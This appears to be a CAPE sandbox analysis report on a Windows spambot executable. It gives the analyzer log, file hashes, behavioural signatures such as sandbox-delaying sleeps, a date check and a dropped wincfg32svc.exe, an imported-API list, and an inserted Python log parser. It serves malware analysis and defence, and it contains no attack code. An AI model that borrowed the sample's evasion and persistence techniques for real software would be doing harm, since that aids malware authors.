CAPE

Triggered CAPE Tasks: Task #29475: Extraction


Analysis

Category Package Started Completed Duration
FILE exe 2019-01-10 01:13:07 2019-01-10 01:16:48 221 seconds
Options: route = internet, procdump = 1
Log:
2019-01-10 01:13:08,000 [root] INFO: Date set to: 01-10-19, time set to: 01:13:08, timeout set to: 200
2019-01-10 01:13:08,015 [root] DEBUG: Starting analyzer from: C:\qfkgiskqi
2019-01-10 01:13:08,015 [root] DEBUG: Storing results at: C:\uSxGnb
2019-01-10 01:13:08,015 [root] DEBUG: Pipe server name: \\.\PIPE\sayWvjWfKf
2019-01-10 01:13:08,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-01-10 01:13:08,015 [root] INFO: Automatically selected analysis package "exe"
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Browser
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 01:13:08,265 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Human
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 01:13:08,279 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 01:13:08,279 [root] DEBUG: Started auxiliary module Usage
2019-01-10 01:13:08,279 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-01-10 01:13:08,279 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-01-10 01:13:08,390 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe" with arguments "" with pid 2924
2019-01-10 01:13:08,390 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 01:13:08,390 [lib.api.process] INFO: 32-bit DLL to inject is C:\qfkgiskqi\dll\IIwaACP.dll, loader C:\qfkgiskqi\bin\uUFCimo.exe
2019-01-10 01:13:08,436 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2924
2019-01-10 01:13:10,448 [lib.api.process] INFO: Successfully resumed process with pid 2924
2019-01-10 01:13:10,448 [root] INFO: Added new process to list with pid: 2924
2019-01-10 01:13:10,526 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 01:13:10,526 [root] DEBUG: Process dumps enabled.
2019-01-10 01:13:10,526 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2924 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 01:13:10,526 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe".
2019-01-10 01:13:10,526 [root] INFO: Monitor successfully loaded in process with pid 2924.
2019-01-10 01:13:10,542 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 01:13:10,542 [root] INFO: Added new process to list with pid: 1636996
2019-01-10 01:13:10,542 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 01:13:11,463 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 01:13:16,438 [root] DEBUG: set_caller_info: Adding region at 0x00300000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 01:13:16,438 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-01-10 01:13:16,438 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-01-10 01:13:16,486 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 01:13:16,516 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 01:13:16,532 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2019-01-10 01:13:16,532 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 01:13:23,584 [root] INFO: Disabling sleep skipping.
2019-01-10 01:13:25,642 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-01-10 01:13:25,674 [root] INFO: Announced 32-bit process name: wincfg32svc.exe pid: 2688
2019-01-10 01:13:25,674 [root] INFO: Added new process to list with pid: 2688
2019-01-10 01:13:25,674 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 01:13:25,674 [lib.api.process] INFO: 32-bit DLL to inject is C:\qfkgiskqi\dll\IIwaACP.dll, loader C:\qfkgiskqi\bin\uUFCimo.exe
2019-01-10 01:13:25,690 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2688
2019-01-10 01:13:25,690 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 01:13:25,690 [root] DEBUG: Process dumps enabled.
2019-01-10 01:13:25,690 [root] INFO: Disabling sleep skipping.
2019-01-10 01:13:25,706 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2688 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 01:13:25,706 [root] DEBUG: Commandline: C:\Windows\750547060050\wincfg32svc.exe.
2019-01-10 01:13:25,706 [root] INFO: Monitor successfully loaded in process with pid 2688.
2019-01-10 01:13:25,706 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 01:13:25,706 [root] INFO: Added new process to list with pid: 1636996
2019-01-10 01:13:25,706 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 01:13:25,783 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 01:13:26,204 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2924
2019-01-10 01:13:26,204 [root] DEBUG: GetHookCallerBase: thread 2928 (handle 0x0), return address 0x0040398D, allocation base 0x00400000.
2019-01-10 01:13:26,204 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 01:13:26,204 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 01:13:26,204 [root] DEBUG: DumpProcess: Module entry point VA is 0x000042EF.
2019-01-10 01:13:26,204 [root] INFO: Added new CAPE file to list with path: C:\uSxGnb\CAPE\2924_8783239332613610412019
2019-01-10 01:13:26,204 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6a00.
2019-01-10 01:13:26,220 [root] DEBUG: DLL unloaded from 0x75140000.
2019-01-10 01:13:26,220 [root] INFO: Notified of termination of process with pid 2924.
2019-01-10 01:13:26,828 [root] INFO: Process with pid 2924 has terminated
2019-01-10 01:13:31,509 [root] DEBUG: set_caller_info: Adding region at 0x00300000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 01:13:31,539 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-01-10 01:13:31,555 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-01-10 01:13:31,571 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 01:13:31,571 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 01:13:31,571 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 01:13:31,586 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 01:13:31,601 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 01:13:31,618 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 01:13:31,634 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2019-01-10 01:13:31,634 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 01:13:40,572 [root] DEBUG: DLL loaded at 0x74850000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2019-01-10 01:13:40,604 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-01-10 01:13:40,650 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-01-10 01:13:40,665 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-01-10 01:13:40,681 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-01-10 01:13:40,681 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-01-10 01:13:40,697 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-01-10 01:13:40,759 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-01-10 01:13:40,822 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-01-10 01:13:40,838 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-01-10 01:13:41,585 [root] DEBUG: DLL loaded at 0x742E0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-01-10 01:13:41,648 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-01-10 01:13:41,664 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:13:41,696 [root] DEBUG: DLL loaded at 0x74280000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\rasman (0x15000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL unloaded from 0x74280000.
2019-01-10 01:13:41,726 [root] DEBUG: DLL loaded at 0x74270000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL loaded at 0x74260000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL unloaded from 0x75600000.
2019-01-10 01:13:41,726 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-01-10 01:13:41,757 [root] DEBUG: DLL loaded at 0x74250000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-01-10 01:13:41,773 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-01-10 01:13:41,789 [root] DEBUG: DLL loaded at 0x741F0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-01-10 01:13:41,805 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-01-10 01:13:41,835 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-01-10 01:13:41,835 [root] DEBUG: DLL loaded at 0x741E0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-01-10 01:13:41,835 [root] DEBUG: DLL loaded at 0x741C0000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-01-10 01:13:41,851 [root] DEBUG: DLL loaded at 0x741B0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-01-10 01:13:41,867 [root] DEBUG: DLL unloaded from 0x74850000.
2019-01-10 01:13:41,867 [root] DEBUG: DLL unloaded from 0x741C0000.
2019-01-10 01:13:42,585 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:13:44,128 [root] DEBUG: DLL unloaded from 0x75600000.
2019-01-10 01:13:44,128 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-01-10 01:13:44,160 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-01-10 01:13:44,176 [root] DEBUG: DLL loaded at 0x741A0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-01-10 01:13:44,191 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-01-10 01:13:53,926 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:13:54,144 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-01-10 01:13:54,144 [root] DEBUG: DLL unloaded from 0x741F0000.
2019-01-10 01:13:54,190 [root] DEBUG: DLL unloaded from 0x75600000.
2019-01-10 01:14:04,237 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:16:32,421 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 01:16:32,421 [root] INFO: Created shutdown mutex.
2019-01-10 01:16:33,436 [root] INFO: Setting terminate event for process 2688.
2019-01-10 01:16:33,451 [root] DEBUG: Terminate Event: Attempting to dump process 2688
2019-01-10 01:16:33,451 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 01:16:33,483 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 01:16:33,513 [root] DEBUG: DumpProcess: Module entry point VA is 0x000042EF.
2019-01-10 01:16:33,545 [root] INFO: Added new CAPE file to list with path: C:\uSxGnb\CAPE\2688_6833147103316110412019
2019-01-10 01:16:33,576 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6a00.
2019-01-10 01:16:33,950 [root] INFO: Shutting down package.
2019-01-10 01:16:33,950 [root] INFO: Stopping auxiliary modules.
2019-01-10 01:16:33,950 [root] INFO: Finishing auxiliary modules.
2019-01-10 01:16:33,950 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 01:16:33,950 [root] INFO: Analysis completed.
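The analyzer log above is easier to triage as a per-PID table: which processes the monitor was injected into, which ones CAPE dumped, which terminated and which were still alive when the 200-second timeout hit. The parser below is an added example, not part of the report and not CAPE code; SAMPLE_LOG is a subset of the log lines above copied verbatim, and the attribution of a "Commandline:" line to the most recently initialised PID follows the line order seen in this log rather than a documented CAPE guarantee.

```python
"""Per-process lifecycle table built from CAPE analyzer log lines.

Added example, not part of the report or of CAPE itself. SAMPLE_LOG is a
subset of the analyzer log lines shown above, copied verbatim.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \[(?P<src>[^\]]+)\] (?P<lvl>\w+): (?P<msg>.*)$"
)
RE_STARTED = re.compile(r'executed process from path "(?P<path>[^"]+)".*with pid (?P<pid>\d+)')
RE_ANNOUNCED = re.compile(r"Announced 32-bit process name: (?P<name>\S*)\s*pid: (?P<pid>\d+)")
RE_INJECTED = re.compile(r"Injected into suspended 32-bit process with pid (?P<pid>\d+)")
RE_ABORTED = re.compile(r"process with pid (?P<pid>\d+) is not alive, injection aborted")
RE_INIT = re.compile(r"CAPE initialised: .*loaded in process (?P<pid>\d+)")
RE_CMDLINE = re.compile(r"Commandline: (?P<cmd>.*)\.$")
RE_DUMPED = re.compile(r"Added new CAPE file to list with path: (?P<path>\S+)")
RE_TERMINATED = re.compile(r"Process with pid (?P<pid>\d+) has terminated")
RE_TIMEOUT = re.compile(r"Analysis timeout hit \((?P<secs>\d+) seconds\)")

SAMPLE_LOG = r"""
2019-01-10 01:13:08,390 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe" with arguments "" with pid 2924
2019-01-10 01:13:08,436 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2924
2019-01-10 01:13:10,526 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2924 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 01:13:10,542 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 01:13:10,542 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 01:13:11,463 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 01:13:25,674 [root] INFO: Announced 32-bit process name: wincfg32svc.exe pid: 2688
2019-01-10 01:13:25,690 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2688
2019-01-10 01:13:25,706 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2688 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 01:13:25,706 [root] DEBUG: Commandline: C:\Windows\750547060050\wincfg32svc.exe.
2019-01-10 01:13:26,204 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2924
2019-01-10 01:13:26,204 [root] INFO: Added new CAPE file to list with path: C:\uSxGnb\CAPE\2924_8783239332613610412019
2019-01-10 01:13:26,828 [root] INFO: Process with pid 2924 has terminated
2019-01-10 01:16:32,421 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 01:16:33,545 [root] INFO: Added new CAPE file to list with path: C:\uSxGnb\CAPE\2688_6833147103316110412019
"""


def new_record():
    return {"name": None, "injected": False, "inject_aborted": False,
            "cmdline": None, "dumps": [], "terminated": None}


def parse(text):
    """Return (processes_by_pid, timed_out) from analyzer log text."""
    procs = defaultdict(new_record)
    current = None  # PID whose monitor initialised last; it owns the next "Commandline:" line
    timed_out = False
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, msg = m["ts"], m["msg"]
        if (x := RE_STARTED.search(msg)):
            procs[int(x["pid"])]["name"] = x["path"].rsplit("\\", 1)[-1]
        elif (x := RE_ANNOUNCED.search(msg)):
            procs[int(x["pid"])]["name"] = x["name"] or None  # empty name stays unknown
        elif (x := RE_INJECTED.search(msg)):
            procs[int(x["pid"])]["injected"] = True
        elif (x := RE_ABORTED.search(msg)):
            procs[int(x["pid"])]["inject_aborted"] = True
        elif (x := RE_INIT.search(msg)):
            current = int(x["pid"])
        elif (x := RE_CMDLINE.search(msg)) and current is not None:
            procs[current]["cmdline"] = x["cmd"]
        elif (x := RE_DUMPED.search(msg)):
            # CAPE dump files are named "<pid>_<timestamp>"; attribute by the prefix.
            pid = int(x["path"].rsplit("\\", 1)[-1].split("_", 1)[0])
            procs[pid]["dumps"].append(x["path"])
        elif (x := RE_TERMINATED.search(msg)):
            procs[int(x["pid"])]["terminated"] = ts
        elif RE_TIMEOUT.search(msg):
            timed_out = True
    return dict(procs), timed_out


def survivors(procs):
    """PIDs that were monitored and had not terminated when the log ended."""
    return sorted(pid for pid, r in procs.items() if r["injected"] and r["terminated"] is None)


if __name__ == "__main__":
    table, timeout = parse(SAMPLE_LOG)
    for pid, r in sorted(table.items()):
        print(pid, r["name"], "injected" if r["injected"] else "not injected",
              "dumps=%d" % len(r["dumps"]), "terminated=%s" % r["terminated"])
    print("timeout:", timeout, "alive at end:", survivors(table))
```

Run against a full analyzer.log the same way; the survivors list is the set of processes whose dump came from the terminate event rather than from NtTerminateProcess, which is the case for wincfg32svc.exe (2688) in this run.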

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-01-10 01:13:08 2019-01-10 01:16:47

File Details

File Name 2019-01-08-spambot-malware.exe
File Size 159744 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 34a7433231c49fa349f75da7426ed65f
SHA1 72ebb653a8e3bccc4f019e2f5fbff5c8bb4e49ad
SHA256 4b9d5841d38b8658466dcaf409c34c0f6d2d1f9ecb64254391a4621465daf79b
SHA512 04d1d37786f5d2347452a9ad4139fd8636bf1eeb1065d194de478bc178e8857a4cec8343e4f0e77f536dfb74ed901061fdc1296284fac262c98ce9285f74dde7
CRC32 10875687
Ssdeep 1536:iUWCvW0XOVwp8OOzn5As9IQsOo1oUHnyoHOvM3D/ozfKiQUS80I8z57jQDzEBCq4:bW2WUOWG/z5ARQGrHbXUS7z57Co/Hg
TrID
  • 34.7% (.EXE) Win32 EXE PECompact compressed (generic) (41569/9/9)
  • 26.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 23.1% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 5.5% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 3.7% (.EXE) Win32 Executable (generic) (4508/7/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: 2019-01-08-spambot-malware.exe, PID 2924
A process attempted to delay the analysis task.
Process: wincfg32svc.exe tried to sleep 1391 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/wcslen
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/fscanf
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/wcscmp
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/atoi
DynamicLoader: msvcrt.dll/fgets
DynamicLoader: msvcrt.dll/strchr
DynamicLoader: msvcrt.dll/strcpy
DynamicLoader: msvcrt.dll/strcat
DynamicLoader: msvcrt.dll/strlen
DynamicLoader: msvcrt.dll/strstr
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/malloc
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/sprintf
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/feof
DynamicLoader: msvcrt.dll/fprintf
DynamicLoader: WS2_32.dll/#115 (WSAStartup)
DynamicLoader: WS2_32.dll/#19 (send)
DynamicLoader: WS2_32.dll/#3 (closesocket)
DynamicLoader: WS2_32.dll/#52 (gethostbyname)
DynamicLoader: WS2_32.dll/#9 (htons)
DynamicLoader: WS2_32.dll/#23 (socket)
DynamicLoader: WS2_32.dll/#4 (connect)
DynamicLoader: WS2_32.dll/#11 (inet_addr)
DynamicLoader: WS2_32.dll/#16 (recv)
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: DNSAPI.dll/DnsQuery_A
DynamicLoader: DNSAPI.dll/DnsFree
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/CharUpperA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: 2019-01-08-spambot-malware.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/wcslen
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/fscanf
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/wcscmp
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/atoi
DynamicLoader: msvcrt.dll/fgets
DynamicLoader: msvcrt.dll/strchr
DynamicLoader: msvcrt.dll/strcpy
DynamicLoader: msvcrt.dll/strcat
DynamicLoader: msvcrt.dll/strlen
DynamicLoader: msvcrt.dll/strstr
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/malloc
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/sprintf
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/feof
DynamicLoader: msvcrt.dll/fprintf
DynamicLoader: WS2_32.dll/#115 (WSAStartup)
DynamicLoader: WS2_32.dll/#19 (send)
DynamicLoader: WS2_32.dll/#3 (closesocket)
DynamicLoader: WS2_32.dll/#52 (gethostbyname)
DynamicLoader: WS2_32.dll/#9 (htons)
DynamicLoader: WS2_32.dll/#23 (socket)
DynamicLoader: WS2_32.dll/#4 (connect)
DynamicLoader: WS2_32.dll/#11 (inet_addr)
DynamicLoader: WS2_32.dll/#16 (recv)
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: DNSAPI.dll/DnsQuery_A
DynamicLoader: DNSAPI.dll/DnsFree
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
